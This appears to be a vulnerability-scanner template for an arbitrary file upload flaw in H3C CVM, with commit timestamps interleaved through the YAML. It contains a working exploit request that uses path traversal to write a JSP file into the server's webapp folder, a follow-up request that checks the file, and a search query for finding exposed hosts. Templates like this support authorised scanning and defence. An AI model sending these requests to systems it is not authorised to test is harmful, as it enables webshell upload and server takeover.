2023-08-21 03:00:47 +00:00
id : h3c-cvm-arbitrary-file-upload
info :
name : H3C CVM - Arbitrary File Upload
author : SleepingBag945
severity : critical
2023-08-21 03:13:24 +00:00
description : |
An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
2023-08-21 03:00:47 +00:00
reference :
2023-08-21 03:13:24 +00:00
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml
2023-08-21 06:07:14 +00:00
- https://github.com/tr0uble-mAker/POC-bomber/blob/main/pocs/redteam/h3c_cvm_fileupload_2022.py
2023-08-21 03:00:47 +00:00
metadata :
max-request : 2
verified : true
2023-08-21 03:13:24 +00:00
fofa-query : server="H3C-CVM"
2023-08-21 06:09:07 +00:00
tags : h3c,lfi,instrusive,file-upload
2023-08-21 03:00:47 +00:00
variables :
2023-08-21 06:07:14 +00:00
filename : "{{rand_base(5)}}"
payload : "{{rand_base(8)}}"
2023-08-21 03:00:47 +00:00
http :
- raw :
- |
2023-08-21 06:07:14 +00:00
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{filename}}.jsp&name=222" HTTP/1.1
2023-08-21 03:00:47 +00:00
Host : {{Hostname}}
Content-range : bytes 0-10/20
Accept-Encoding : gzip, deflate
2023-08-21 06:07:14 +00:00
{{payload}}
2023-08-21 03:00:47 +00:00
- |
2023-08-21 06:07:14 +00:00
GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1
2023-08-21 03:00:47 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2023-08-21 06:07:14 +00:00
part : body_2
2023-08-21 03:00:47 +00:00
words :
2023-08-21 06:07:14 +00:00
- "{{payload}}"
2023-08-21 03:00:47 +00:00
- type : word
part : header
words :
- "Content-Type: text/html"
- type : status
status :
2023-08-21 03:08:07 +00:00
- 200